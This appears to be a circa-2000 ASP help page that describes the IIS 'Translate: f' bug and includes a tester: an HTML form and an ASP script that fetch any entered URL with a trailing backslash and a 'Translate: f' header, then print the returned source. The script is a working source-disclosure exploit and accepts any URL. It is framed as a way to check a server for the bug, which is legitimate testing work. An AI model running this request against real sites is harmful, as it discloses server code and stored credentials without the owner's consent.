related sites: <FREE Help> <ASP> <Asp.net> <worldwide> feedback: <lovethat> <hatethat> <thanks> <credits> <contact us>
Translate: f Bug
This latest security breach (discovered in July 2000 time-frame) allows any program (TELNET, AspHTTP, etc.) to set a custom header with "translate f" and a URL with a \ on the end.
Read the full-story @ http://www.4guysfromrolla.com/webtech/081500-1.shtml
If you want to know all the ins-and-outs of ASP security join http://www.asplists.com/aspsecurity where that is all we discuss.
The component used in this script ASPHTTP is a 3rd-party componetnt from www.serverobjects.com. It uses this components (as opposed to WinInet/ XMLHTTP), because this is a thread-safe way to retrieve a URL, see: http://www.learnasp.com/advice/threadsafe.asp
<Test Script Below>
<html> <head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta name="GENERATOR" content="Microsoft FrontPage 4.0"> <meta name="ProgId" content="FrontPage.Editor.Document"> <title>TranslateFbug</title> </head> <body> <p>Enter URL<br> for example http://www.whatever.com/default.asp<br> for example http://www.whatever.com/global.asa</p> <form method="POST" action="translatefbugrespond.asp"> <p><input type="text" name="URL" size="68"><br> <input type="submit" value="Check This URL for The TranslateF bug" name="Button"></p> </form> </body> </html>
<html><head> <title>asphttptranslatebug.asp</title> </head> <body> <% Set HttpObj = Server.CreateObject("AspHTTP.Conn") theURL=request("URL") IF instr(lcase(theURL),"http://")=0 THEN response.write "You ommitted http://<br>" response.write "this tester requires the http:// before any URL to be tested" response.end END IF HttpObj.Url = theURL & "\" HTTPObj.AddExtraHeader ("Translate: f") strResult = HttpObj.GetURL STRresult=server.htmlencode(STRresult) STRresult=replace(StrResult,vbcrlf,"<br>") response.write STRresult SET HTTPobj = nothing %> </body> </html>